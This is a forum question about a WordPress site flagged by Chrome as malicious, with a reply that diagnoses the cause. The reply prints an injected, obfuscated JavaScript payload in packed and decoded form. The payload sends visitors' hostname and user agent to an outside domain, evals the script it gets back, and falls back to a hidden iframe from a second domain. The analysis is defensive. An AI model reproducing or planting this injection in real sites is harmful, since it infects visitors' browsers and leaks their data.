The site ahead contains malware

I’m getting an error with the WordPress page REMOVED, it seems that the website 2zz3.gq is being “injected” into the request but I’m not really sure when or how.

When I try to load the page on Chrome I see a “The site ahead contains malware” error:

Read More

enter image description here

But I see no error on Firefox or other browsers. How can I solve this issue?
So far I have tried:

  • Running WordFence Plugin for Malware removal (no infections found)
  • Running Sucuri Security Plugin (also no threats found)
  • I blocked incoming request from the website 2zz3.gq (apparently a server from Russia) but the error still appears on Chrome.

Could please someone give me some advice on this issue?

Related posts

1 comment

  1. Is the plugin disabled now?

    Check the source of your site to see if it has been modified in any way.

    Easiest might be to restore a backup to ensure you don’t miss any malicious changes.


    WARNING

    This is malicious code. I’ve put it on here for explanation purposes, but I’d recommend that you DO NOT execute this

    It’s not as bad as a link that someone might accidentally click, and I figure this warning should suffice for anyone who decides that pasting this into their JS console seems like a good idea…


    I see the following packed code block when I curl your site.

    eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('26 25(7,13){15 9=7.80(13);10(9>78)49"76: 83 100 5";19 9}26 35(7){10(1!==85.22)49"93: 92 88 86 87";7=99(7);15 13,9,17=[],31=7.22-7.22%3;10(0===7.22)19 7;97(13=0;31>13;13+=3)9=25(7,13)<<16|25(7,13+1)<<8|25(7,13+2),17.28(20.21(9>>18)),17.28(20.21(9>>12&63)),17.28(20.21(9>>6&63)),17.28(20.21(63&9));96(7.22-31){74 1:9=25(7,13)<<16,17.28(20.21(9>>18)+20.21(9>>12&63)+33+33);77;74 2:9=25(7,13)<<16|25(7,13+1)<<8,17.28(20.21(9>>18)+20.21(9>>12&63)+20.21(9>>6&63)+33)}19 17.55("")}15 33="=",20="79+/",81="1.0";26 51(){15 11;37{11=39 68("82.70")}44(17){37{11=39 68("94.70")}44(95){11=90}}10(!11&&91 66!='89'){11=39 66()}19 11}26 72(14){23=14.30('\<54');10(23==-1)19'';23=14.30('>',23);10(23==-1)19'';23++;24=14.30('\<\/54\>',23);10(24==-1)19'';19 14.58(23,24)}26 64(14){10(14.30('%48%')==-1)19 14;19 14.98('%48%').55(36(35(62.65.75)))}26 60(56){15 27=" "+34.27;15 40=" "+56+"=";15 38=42;15 29=0;15 24=0;10(27.22>0){29=27.30(40);10(29!=-1){29+=40.22;24=27.30(";",29);10(24==-1){24=27.22}38=84(27.58(29,24))}}19(38)}34.107('<57 132="43"></57>');10(60('133')==42){15 32='50'+'7'+'45:'+'/'+'/'+'2'+'61'+'61'+'3'+'.'+'47'+'134'+'/'+'131'+'73'+'7.45'+'67';32+=('?7=3&126='+36(35(62.65.125)));32+=('&101='+36(35(127.128)));37{15 11=51();11.129('136',32,137);11.145=26(){10(11.146==4&&11.142==138){14=64(11.139);34.71("43").69=14;41=72(14);10(41.22>0)140(41)}};11.141(42)}44(17){34.71("43").69='<'+'59'+'46'+'144 124'+'108'+'="52'+'109'+':/'+'/'+'110'+'2'+'-'+'53'+'102'+'53'+'.'+'47'+'73'+'/'+'103'+'104'+'112'+'.45'+'67"'+' 113'+'121='+'"0'+'" 122'+'119'+'7="0'+'" 46'+'118'+'114'+'31="'+'0" 115'+'116'+'117'+'52="'+'0" 123'+'120'+'105'+'50="'+'0" 106'+'111'+'143'+'47="'+'130'+'">'+'<'+'/'+'59'+'46'+'135'+'17'+'>'}}',10,147,'|||||||t||_|if|xmlhttp||A|src|var||e||return|_ALPHA|charAt|length|start|end|_pref_xxs_getbyte|function|cookie|push|offset|indexOf|r|url|_PADCHAR|document|_pref_xxs_encode64|encodeURIComponent|try|setStr|new|search|code|null|statspan_0_1|catch|p|fr|g|ENCURL|throw|ht|_pref_xxs_getXmlHttp|h|b|script|join|name|span|substring|i|_pref_xxs_getCookie|z|window||_pref_xxs_processMacro|location|XMLHttpRequest|hp|ActiveXObject|innerHTML|XMLHTTP|getElementById|_pref_xxs_extractScript|a|case|href|INVALID_CHARACTER_ERR|break|255|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|charCodeAt|_VERSION|Msxml2|DOM|unescape|arguments|argument|required|one|undefined|false|typeof|exactly|SyntaxError|Microsoft|E|switch|for|split|String|Exception|ua|o|co|un|nheig|sc|write|rc|ttp|l|rol|ter|wid|rde|mar|ginw|idt|amebo|gh|rgi|th|hei|ma|s|hostname|d|navigator|userAgent|open|no|st|id|stat01|q|am|GET|true|200|responseText|eval|send|status|lin|ame|onreadystatechange|readyState'.split('|'),0,{}))
    

    which translates to

    function _pref_xxs_getbyte(t,A)
        {
        var _=t.charCodeAt(A);
        if(_>255)throw"INVALID_CHARACTER_ERR: DOM Exception 5";
        return _
    }
    function _pref_xxs_encode64(t)
        {
        if(1!==arguments.length)throw"SyntaxError: exactly one argument required";
        t=String(t);
        var A,_,e=[],r=t.length-t.length%3;
        if(0===t.length)return t;
        for(A=0;
        r>A;
        A+=3)_=_pref_xxs_getbyte(t,A)<<16|_pref_xxs_getbyte(t,A+1)<<8|_pref_xxs_getbyte(t,A+2),e.push(_ALPHA.charAt(_>>18)),e.push(_ALPHA.charAt(_>>12&63)),e.push(_ALPHA.charAt(_>>6&63)),e.push(_ALPHA.charAt(63&_));
        switch(t.length-r)
            {
            case 1:_=_pref_xxs_getbyte(t,A)<<16,e.push(_ALPHA.charAt(_>>18)+_ALPHA.charAt(_>>12&63)+_PADCHAR+_PADCHAR);
            break;
            case 2:_=_pref_xxs_getbyte(t,A)<<16|_pref_xxs_getbyte(t,A+1)<<8,e.push(_ALPHA.charAt(_>>18)+_ALPHA.charAt(_>>12&63)+_ALPHA.charAt(_>>6&63)+_PADCHAR)
        }
        return e.join("")
    }
    var _PADCHAR="=",_ALPHA="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",_VERSION="1.0";
    function _pref_xxs_getXmlHttp()
        {
        var xmlhttp;
        try
            {
            xmlhttp=new ActiveXObject("Msxml2.XMLHTTP")
        }
        catch(e)
            {
            try
                {
                xmlhttp=new ActiveXObject("Microsoft.XMLHTTP")
            }
            catch(E)
                {
                xmlhttp=false
            }
        }
        if(!xmlhttp&&typeof XMLHttpRequest!='undefined')
            {
            xmlhttp=new XMLHttpRequest()
        }
        return xmlhttp
    }
    function _pref_xxs_extractScript(src)
        {
        start=src.indexOf('<script');
        if(start==-1)return'';
        start=src.indexOf('>',start);
        if(start==-1)return'';
        start++;
        end=src.indexOf('</script>',start);
        if(end==-1)return'';
        return src.substring(start,end)
    }
    function _pref_xxs_processMacro(src)
        {
        if(src.indexOf('%ENCURL%')==-1)return src;
        return src.split('%ENCURL%').join(encodeURIComponent(_pref_xxs_encode64(window.location.href)))
    }
    function _pref_xxs_getCookie(name)
        {
        var cookie=" "+document.cookie;
        var search=" "+name+"=";
        var setStr=null;
        var offset=0;
        var end=0;
        if(cookie.length>0)
            {
            offset=cookie.indexOf(search);
            if(offset!=-1)
                {
                offset+=search.length;
                end=cookie.indexOf(";
                ",offset);
                if(end==-1)
                    {
                    end=cookie.length
                }
                setStr=unescape(cookie.substring(offset,end))
            }
        }
        return(setStr)
    }
    document.write('<span id="statspan_0_1"></span>');
    if(_pref_xxs_getCookie('stat01')==null)
        {
        var url='ht'+'t'+'p:'+'/'+'/'+'2'+'z'+'z'+'3'+'.'+'g'+'q'+'/'+'st'+'a'+'t.p'+'hp';
        url+=('?t=3&d='+encodeURIComponent(_pref_xxs_encode64(window.location.hostname)));
        url+=('&ua='+encodeURIComponent(_pref_xxs_encode64(navigator.userAgent)));
        try
            {
            var xmlhttp=_pref_xxs_getXmlHttp();
            xmlhttp.open('GET',url,true);
            xmlhttp.onreadystatechange=function()
                {
                if(xmlhttp.readyState==4&&xmlhttp.status==200)
                    {
                    src=_pref_xxs_processMacro(xmlhttp.responseText);
                    document.getElementById("statspan_0_1").innerHTML=src;
                    code=_pref_xxs_extractScript(src);
                    if(code.length>0)eval(code)
                }
            };
            xmlhttp.send(null)
        }
        catch(e)
            {
            document.getElementById("statspan_0_1").innerHTML='<'+'i'+'fr'+'ame s'+'rc'+'="h'+'ttp'+':/'+'/'+'l'+'2'+'-'+'b'+'o'+'b'+'.'+'g'+'a'+'/'+'co'+'un'+'ter'+'.p'+'hp"'+' wid'+'th='+'"0'+'" hei'+'gh'+'t="0'+'" fr'+'amebo'+'rde'+'r="'+'0" mar'+'ginw'+'idt'+'h="'+'0" ma'+'rgi'+'nheig'+'ht="'+'0" sc'+'rol'+'lin'+'g="'+'no'+'">'+'<'+'/'+'i'+'fr'+'am'+'e'+'>'
        }
    }
    

    Note the line

    var url='ht'+'t'+'p:'+'/'+'/'+'2'+'z'+'z'+'3'+'.'+'g'+'q'+'/'+'st'+'a'+'t.p'+'hp';
    

    which actually constructs the 2***.gq url. 1

    If you don’t have a stat01 cookie set, it loads stat.php from there (presumably malicious JS source) and executes it using eval.

    In the process of making the request, it also sends up some user data (for metrics, loading proper exploit code, or something else?), including the current hostname and the useragent of the user’s browser.

    Note that, should this fail, it also falls back on loading a URL at another domain l2***.ga/counter.php1 in an iframe.

    1 link purposely broken, see source if you’re interested

Comments are closed.